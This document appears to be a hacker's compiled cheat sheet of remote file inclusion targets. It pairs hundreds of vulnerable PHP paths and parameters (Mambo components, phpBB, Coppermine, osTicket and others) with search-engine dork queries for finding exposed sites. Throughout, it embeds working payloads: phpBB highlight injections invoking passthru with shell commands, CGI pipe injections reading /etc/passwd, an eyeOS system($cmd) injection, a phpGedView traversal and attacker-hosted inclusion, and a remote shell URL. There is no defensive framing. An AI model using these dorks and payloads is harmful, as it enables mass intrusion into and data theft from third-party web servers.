/templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
index.php?var= inurl:"index.php?var=*.php"
index.php?pagina= inurl:"index.php?pagina=*.php"
index.php?go= inurl:"index.php?go="
index.php?site= inurl:"index.php?site="
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler"
index.php?pagina= inurl:"index.php?pagina=*.php"
index.php?id= inurl:"index.php?id=*.php"
index1.php?= inurl:"index1.php?=*.php?
index.php?site= inurl:"index.php?site=*.php"
main.php?id= inurl:"main.php?id=*.php"
content.php?page= inurl:"content.php?page=*.php"
admin.php?page= inurl:"admin.php?page=*.php"
lib/gore.php?libpath= inurl:"/SQuery/"
SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
index2.php?p= inurl:"index2.php?p=*.php"
index1.php?go= inurl:"index1.php?go=*.php"
news_detail.php?file= inurl:"news_detail.php?file=*.php"
old_reports.php?file= inurl:"old_reports.php?file=*.php"
index.php?x= inurl:"index.php?x=*.php"
index.php?nic= inurl:"index.php?nic=*.php"
homepage.php?sel= inurl:"homepage.php?sel=*.php"
index.php?sel= inurl:"index.php?sel=*.php"
main.php?x= inurl:"main.php?x=*.php"
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks"
index2.php?x= inurl:index2.php?x=*.php"
main.php?pagina= inurl:"main.php?pagina=*.php"
test.php?page= allinurl:test.php?page=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"
akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
index.php?page= inurl:"edu/index.php?page=*.php"
*.php?page= inurl:*.php?page=*.php"
index.php?oldal= inurl:"index.php?oldal=*.php"
index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php"
index.php?pag= inurl:"index.php?pag=*.php"
index.php?incl= inurl:"index.php?incl="
avatar.php?page= inurl:"avatar.php?page="
index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_abso l ute_path= "Mambo is A Free"
index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_abso l ute_path= "Mambo is"
index.php?p= inurl:"edu/index.php?p=*.php"
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
index.php?x= inurl:"com/index.php?x=*.php"
index.php?mode= inurl:"com/index.php?mode=*.php"
index.php?stranica= inurl:"index.php?stranica="
index.php?sub= inurl:"il/index.php?sub=*.php"
index.php?id= inurl:"/index.php?id=*.php"
index.php?t= inurl:"/index.php?t=*.php"
index.php?r= inurl:"index.php?r=*.php"
index.php?menu= inurl:"net/index.php?menu=*.php"
index.php?pag= inurl:"com/index.php?pag=*.php"
solpot.html?body= allinurl: "solpot.html?body"
port.php?content= inurlort.php?content=*.php"
index0.php?show= inurl:index0.php?show=*.php"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
/tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
content.php?page= inurl:"*content.php?page=*.php"
index.php?topic= inurl:"/index.php?topic=*.php"
index.php?u= inurl:"/index.php?u=*.php"
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path= inurl:"com_linkdirectory"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components"
modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"
/modules/vwar/admin/admin.php?vwar_root= inurl:"vwar"
index.php?loc= allinurl:.br/index.php?loc=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage"
/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
myevent.php?myevent_path= inurl:myevent.php
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp"
myevent.php?myevent_path= inurl:"uk/myevent.php
includes/functions.php?phpbb_root_path= powered by Integramod
m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
show.php?path= inurl:fclick
show.php?path= inurl:.ac.uk/fclick
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path= inurl:".de.*/com_linkdirectory"
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"
index.php?template= inurl:"index.php?"
search.php?cutepath= inurl:"search.php?"

show_news.php?cutepath= inurl:"show_news.php?"
page.php?doc= allinurl:"page.php?doc="
administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm"
help.php?css_path= inurlhplive site:.ru
components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/"
big.php?pathtotemplate= inurl:".de.*"big.php?"
includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?"
interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
/functions.php?include_path= "powered by: phpecard"
modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery"
components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
/class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
/squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
index2.php?to= inurl:"/index2.php?to=*.php"
index.php?load= inurl:"/index.php?load=*.php"
home.php?pagina= inurl:"home.php?pagina="
/modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
/modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
/modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
/modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
/include/write.php?dir= allinurl:/zboard/zboard.php
db.php?path_local= inurl:"db.php?path_local="
index.php?site= inurl:"index.php?site="
index.php?url= inurl:"index.php?url="
index.php?p= inurl:"index.php?p="
index.php?openfile= inurl:"index.php?openfile="
index.php?file= inurl:"index.php?file="
index.php?go= inurl:"index.php?go="
index.php?content= inurl:"index.php?content="
index.php?side= inurl:"index.php?side="
index.php?kobr= inurl:"index.php?kobr="
index.php?pg= inurl:"index.php?pg="
index.php?doc= inurl:"index.php?doc="
index.php?l= inurl:"index.php?l="
index.php?a= inurl:"index.php?a="
index.php?principal= inurl:"index.php?principal="
index.php?show= inurl:"index.php?show="
index.php?opcao= inurl:"index.php?opcao="
index.php?conteudo= inurl:"index.php?conteudo="
index.php?meio= inurl:"index.php?meio="
index.php?inc= inurl:"index.php?inc="
index.php?c= inurl:"index.php?c="
index.php?rage= inurl:"index.php?rage="
index.php?arquivo= inurl:"index.php?arquivo="
index.php?nic= inurl:"index.php?nic="
index.php?x= inurl:"index.php?x="
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_p ath= inurl:"com_mtree"
index.php?place= inurl:"index.php?place="
index.php?show= inurl:"index.php?show="
index.php?dsp= inurl:"index.php?dsp="
index.php?dept= inurl:"index.php?dept="
index.php?lg= inurl:"index.php?lg="
index.php?inhalt= inurl:"index.php?inhalt="
index.php?ort= inurl:"index.php?ort="
index.php?pilih= inurl:"index.php?pilih="
principal.php?conteudo= inurl:"principal.php?conteudo="
main.php?site= inurl:"main.php?site="
template.php?pagina= inurl:"template.php?pagina="
contenido.php?sec= inurl:"contenido.php?sec="
index_principal.php?pagina= inurl:"index_principal.php?pagina="
template.php?name= inurl:"template.php?name="
forum.php?act= inurl:"forum.php?act="
home.php?action= inurl:"home.php?action="
home.php?pagina= inurl:"home.php?pagina="
noticias.php?arq= inurl:"noticias.php?arq="
main.php?x= inurl:"main.php?x="
main.php?page= inurl:"main.php?page="
default.php?page= inurl:"default.php?page="
index.php?cont= inurl:"index.php?cont="
index.php?configFile= inurl:"index.php?configFile="
index.php?meio.php= inurl:"index.php?meio.php="
index.php?include= inurl:"index.php?include="
index.php?open= inurl:"index.php?open="
index.php?visualizar= inurl:"index.php?visualizar="
index.php?x= inurl:"index.php?x="
index.php?pag= inurl:"index.php?pag="
index.php?cat= inurl:"index.php?cat="
index.php?action= inurl:"index.php?action="
index.php?do= inurl:"index.php?do="
index2.php?x= inurl:"index2.php?x="
index2.php?content= inurl:"index2.php?content="
main.php?pagina= inurl:"main.php?pagina="
index.phpmain.php?x= inurl:"index.phpmain.php?x="
index.php?link= inurl:"index.php?link="
index.php?canal= inurl:"index.php?canal="
index.php?screen= inurl:"index.php?screen="
index.php?langc= inurl:"index.php?langc="
services.php?page= inurl:"services.php?page="
htmltonuke.php?filnavn= inurl:"htmltonuke.php?filnavn="
ihm.php?p= inurl:"ihm.php?p="
default.php?page= inurl:"default.php?page="
folder.php?id= inurl:"folder.php?id="
index.php?Load= inurl:"index.php?Load="
index.php?Language= inurl:"index.php?Language="
hall.php?file= inurl:"hall.php?file="
hall.php?page= inurl:"hall.php?page="
template.php?goto= inurl:"template.php?goto="
video.php?content= inurl:"video.php?content="
pages.php?page= inurl:"pages.php?page="
print.php?page= inurl:"print.php?page="
show.php?page= inurl:"show.php?page="
view.php?page= inurl:"view.php?page="
media.php?page= inurl:"media.php?page="
index1.php?choix= inurl:"index1.php?choix="
index1.php?menu= inurl:"index1.php?menu"
index.php?ort= inurl:"index.php?ort="
index2.php?showpage= inurl:"index2.php?showpage="
index2.php?ascii_seite= inurl:"index2.php?ascii_seite="
index2.php?DoAction= inurl:"index2.php?DoAction="
index2.php?ID= inurl:"index2.php?ID="
index2.php?url_page= inurl:"index2.php?url_page="
index1.php?dat= inurl:"index1.php?dat="
index1.php?site= inurl:"index1.php?site="
index0.php?show= inurl:"index0.php?show="
home.php?content= inurl:"home.php?content="
port.php?content= inurl:"port.php?content="
main.php?link= inurl:"main.php?link="
home.php?x= inurl:"home.php?x="
index1.php?x= inurl:"index1.php?x="
index2.php?x= inurl:"index2.php?x="
main.php?x= inurl:"main.php?x="
homepage.php?sel= inurl:"homepage.php?sel="
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
/modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
/include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
/contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat exthp
/phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat exthp
/photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
/bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
/ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
/spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
/classes.php?LOCAL_PATH= "powered by siteframe"
al_initialize.php?alpath= "Powered by AutoLinks Pro"
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov*
/extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests"
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery"
/components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf"
/components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook"
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br
bp_ncom.php?bnrep= "Script réalisé par BinGo PHP"
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h= inurl:"/com_mtree/"
/jscript.php?my_ms[root]= intitle:"myspeach" inurl:"chat_exemple.php"
/popup_window.php?site_isp_root= inurl:"Squirrelcart"
/yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
/include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
/include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:us
/includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
agendax/addevent.inc.php?agendax_path=
allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
apa_phpinclude.inc.php?apa_module_basedir=
ashheadlines.php?pathtoashnews=
ashnews.php?pathtoashnews=
bb_lib/checkdb.inc.php?libpach=
becommunity/community/index.php?from_market=Y&pageurl=
becommunity/community/index.php?pageurl=
bug_sponsorship_list_view_inc.php?t_core_path=
classes.php?LOCAL_PATH=
coppermine/themes/maze/theme.php?THEME_DIR=
default.php?page=
demo/includes/init.php?user_inc=
derniers_commentaires.php?rep=
e107/e107_handlers/secure_img_render.php?p=
extensions/moblog/moblog_lib.php?basedir=
forum/include/common.php?pun_root=
Gallery/displayCategory.php?basepath=
GradeMap/index.php?page=
inc/shows.inc.php?cutepath=
inc/tell_a_friend.inc.php?script_root=
include/db.php?GLOBALS[rootdp]=
include/livre_include.php?no_connect=lol&chem_absolu=
include/new-visitor.inc.php?lvc_include_dir=
includes/db.php?phpbb_root_path=
includes/header.php?systempath=
index.inc.php?PATH_Includes=
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
index.php?action=
index.php?cat=
index.php?conteudo=
index.php?from_market=Y&pageurl=
index1.php?p=
index2.php?content=
index2.php?includes_dir=
index2.php?x=
jaf/index.php?show=
index.php?user=english&l=1&t=1&a=
library/editor/editor.php?root=
library/lib.php?root=
main.php?page=
main.php?x=
modules/4nAlbum/public/displayCategory.php?basepath=
modules/agendax/addevent.inc.php?agendax_path=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
modules/coppermine/themes/default/theme.php?THEME_DIR=
modules/mod_mainmenu.php?mosConfig_absolute_path=
modules/My_eGallery/public/displayCategory.php?basepath=
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
myPHPCalendar/admin.php?cal_dir=
nphp/nphpd.php?nphp_config[LangFile]=
path_to_athena/athena.php?athena_dir=
path_to_phpgreetz/content.php?content=
path_to_qnews/q-news.php?id=
pivot/modules/module_db.php?pivot_path=
poll/admin/common.inc.php?base_path=
pollvote/pollvote.php?pollname=
protection.php?action=logout&siteurl=
shoutbox/expanded.php?conf=
sources/post.php?fil_config=
vCard/admin/define.inc.php?match=
yabbse/Sources/Packages.php?sourcedir=
zentrack/index.php?configFile=
phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
================================================== =============================
1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
5. allinurl:PNphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. allinurl:ihm.php?p=
7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=
11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=
12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=
14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=
15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
16. allinurl:ihm.php?p=*
14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=
15. allinurl:.php?bodyfile=
16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
17. allinurl:modules.php?name=Forums
/modules.php?name=
18. allinurl:/default.php?page=home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=
21. Key Word: ( Nuke ET Copyright © 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
22. allinurl:application.php?base_path=
/application.php?base_path=
23. allinurlhplivehelper
/phplivehelper/initiate.php?abs_path=
24. allinurlhpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=
26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=
27. allinurl:/forum/
/forum/admin/index.php?inc_conf=
28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=
29. allinurl:shoutbox/expanded.php filetypehp
/shoutbox/expanded.php?conf=
30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=
31. keyword : "Powered by iUser"
/common.php?include_path=
32. allinurl: "static.php?load="
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=
35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
36. phpGedView 2.65.1
I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)
- -- HTTP Request --
/[phpGedView-directory]/editconfig_gedcom.php?gedcom_conf]http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_conf
ig=../../../../../../etc/passwd
or
/[phpGedView-directory]/editconfig_gedcom.php]http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd
- -- HTTP Request --
Code impacted : editconfig_gedcom.php
61:if (empty($gedcom_config)) {
62: if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
63: else $gedcom_config = "config_gedcom.php";
64:}
65:
66:require($gedcom_config);
The both GET/POST requets will work evenif PHP register_globals is Off.
II - PHP Injection
(HIGH Risk no authentication needed)
- -- HTTP Request --
/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BAS]http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BAS
E_DIRECTORY=http://attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme .php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php" );
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform
a /session.php]http://[target]/session.php request the GEDCOM file will be in argument of the
login.php call.
The attacker has to create on his web site a directory call themes/standard, and
a file theme.php
For example: theme.php =
and the request, will execute the phpinfo() command on the vulnerable target.

37. inurl:signup.php?usertype=pf
=http://www.geocities.com/k4k3_rgb/test?cmd]http://www.contoh.com/common.inc.php?CFG[libdir]=http://www.geocities.com/k4k3_rgb/test?cmd

================================================== ===========================
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/cgi-bin/diary/sdy.cgi?md=past&tg=200405.dat|uname%20-a|
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_ GET_VARS[sh]).%2527&sh=ls%20-al
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_ GET_VARS[sh]).%2527&sh=ls%20-al
/forumlinux/viewtopic.php?t=29%20&highlight=%2527&highlight=%2 527.passthru($HTTP_GET_VARS[CMD]).%2527&CMD=ls%20-al;
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/cgi-bin/site/session.cgi?page=links.html|cat /etc/passwd|
/forums/viewtopic.php?t=4&highlight=%2527.passthru($HTTP_G ET_VARS[a]).%2527&a=dir%20....
/phpBB2/viewtopic.php?t=7&highlight=%2527.passthru($HTTP_G ET_VARS[a]).%2527&a=id;pwd
/forum/viewtopic.php?t=232&highlight=%2527.phpinfo().%252 7
/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_G ET_VARS[a]).%2527&a=id;pwd
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/allinurl:/index.php?page= site:*.dk
/allinurl:"pnphpbb2
/inurl:/allmyguest
/allinurl:/index.php?file= site:*.dk
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

Strings of Remote File Inclusion

/index.php?mosConfig_absolute_path=
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= allinurl:"com_a6mambohelpdesk"
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= allinurl:com_mgm
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= allinurl:com_colophon
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= allinurl:com_bayesiannaivefilter
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= .au "Remository 3.20." com_remository + /components/com_remository/ + /component/option,com_remository
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
com_webring
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=

/components/com_mambowiki/ MamboLogin.php?IP=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= inurl:"com_phpshop"
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= inurl:"com_phpshop"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_lm/archive.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path= inurl:com_loudmounth
/components/com_securityimages/lang.php?mosConfig_absolute_path= inurl:com_securityimages
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= inurl:com_artlinks
/components/com_madeira/img.php?url=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= inurl:com_pccookbook
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path= inurl:/component/option,com_jd-wiki /index.php?option=com_jd-wiki
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=

/skins/advanced/advanced1.php?pluginpath[0]=
